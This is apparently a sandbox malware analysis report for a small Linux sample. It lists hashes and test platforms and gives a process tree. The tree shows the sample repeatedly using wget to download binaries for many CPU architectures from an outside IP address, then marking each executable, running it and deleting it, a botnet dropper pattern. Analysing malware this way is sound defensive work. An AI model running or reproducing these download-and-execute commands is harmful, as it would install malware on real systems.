Analysis
-
max time kernel
36s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240418-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240418-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
05/05/2024, 02:27
Static task
static1
Behavioral task
behavioral1
Sample
15917961bac6063481040fcc4af85061_JaffaCakes118
Resource
ubuntu1804-amd64-20240418-en
Behavioral task
behavioral2
Sample
15917961bac6063481040fcc4af85061_JaffaCakes118
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
15917961bac6063481040fcc4af85061_JaffaCakes118
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
15917961bac6063481040fcc4af85061_JaffaCakes118
Resource
debian9-mipsel-20240226-en
General
-
Target
15917961bac6063481040fcc4af85061_JaffaCakes118
-
Size
1KB
-
MD5
15917961bac6063481040fcc4af85061
-
SHA1
cbd80d0978a0aaff4116d680da328cf5fd1153e9
-
SHA256
f7e374f479296d08a98d549c93433ec13ddeaf6835ea9d76d0bf33c23ff24682
-
SHA512
a284a0a6483d65b46cef2fd129fc68b40feb2a1bef82cb89ea12027462c23a0dc3ee87e48f09aa7302dc96bcbdf1b4f8bacab82ba7d0507f86e660f03d1b4935
Malware Config
Signatures
Processes
-
/tmp/15917961bac6063481040fcc4af85061_JaffaCakes118/tmp/15917961bac6063481040fcc4af85061_JaffaCakes1181⤵PID:1533
-
/usr/bin/wgetwget http://45.95.168.138/mips2⤵PID:1534
-
-
/bin/chmodchmod +x mips2⤵PID:1538
-
-
/tmp/mips./mips2⤵PID:1539
-
-
/bin/rmrm -rf mips2⤵PID:1540
-
-
/usr/bin/wgetwget http://45.95.168.138/mipsel2⤵PID:1541
-
-
/bin/chmodchmod +x mipsel2⤵PID:1542
-
-
/tmp/mipsel./mipsel2⤵PID:1543
-
-
/bin/rmrm -rf mipsel2⤵PID:1544
-
-
/usr/bin/wgetwget http://45.95.168.138/sh42⤵PID:1545
-
-
/bin/chmodchmod +x sh42⤵PID:1546
-
-
/tmp/sh4./sh42⤵PID:1547
-
-
/bin/rmrm -rf sh42⤵PID:1548
-
-
/usr/bin/wgetwget http://45.95.168.138/x862⤵PID:1549
-
-
/bin/chmodchmod +x x862⤵PID:1550
-
-
/tmp/x86./x862⤵PID:1551
-
-
/bin/rmrm -rf x862⤵PID:1552
-
-
/usr/bin/wgetwget http://45.95.168.138/armv6l2⤵PID:1553
-
-
/bin/chmodchmod +x armv6l2⤵PID:1554
-
-
/tmp/armv6l./armv6l2⤵PID:1555
-
-
/bin/rmrm -rf armv6l2⤵PID:1556
-
-
/usr/bin/wgetwget http://45.95.168.138/i6862⤵PID:1557
-
-
/bin/chmodchmod +x i6862⤵PID:1558
-
-
/tmp/i686./i6862⤵PID:1559
-
-
/bin/rmrm -rf i6862⤵PID:1560
-
-
/usr/bin/wgetwget http://45.95.168.138/powerpc2⤵PID:1561
-
-
/bin/chmodchmod +x powerpc2⤵PID:1562
-
-
/tmp/powerpc./powerpc2⤵PID:1563
-
-
/bin/rmrm -rf powerpc2⤵PID:1564
-
-
/usr/bin/wgetwget http://45.95.168.138/i5862⤵PID:1565
-
-
/bin/chmodchmod +x i5862⤵PID:1566
-
-
/tmp/i586./i5862⤵PID:1567
-
-
/bin/rmrm -rf i5862⤵PID:1568
-
-
/usr/bin/wgetwget http://45.95.168.138/m68k2⤵PID:1569
-
-
/bin/chmodchmod +x m68k2⤵PID:1570
-
-
/tmp/m68k./m68k2⤵PID:1571
-
-
/bin/rmrm -rf m68k2⤵PID:1572
-
-
/usr/bin/wgetwget http://45.95.168.138/sparc2⤵PID:1573
-
-
/bin/chmodchmod +x sparc2⤵PID:1576
-
-
/tmp/sparc./sparc2⤵PID:1577
-
-
/bin/rmrm -rf sparc2⤵PID:1578
-
-
/usr/bin/wgetwget http://45.95.168.138/armv4l2⤵PID:1579
-
-
/bin/chmodchmod +x armv4l2⤵PID:1580
-
-
/tmp/armv4l./armv4l2⤵PID:1581
-
-
/bin/rmrm -rf armv4l2⤵PID:1582
-
-
/usr/bin/wgetwget http://45.95.168.138/armv5l2⤵PID:1583
-
-
/bin/chmodchmod +x armv5l2⤵PID:1584
-
-
/tmp/armv5l./armv5l2⤵PID:1585
-
-
/bin/rmrm -rf armv5l2⤵PID:1586
-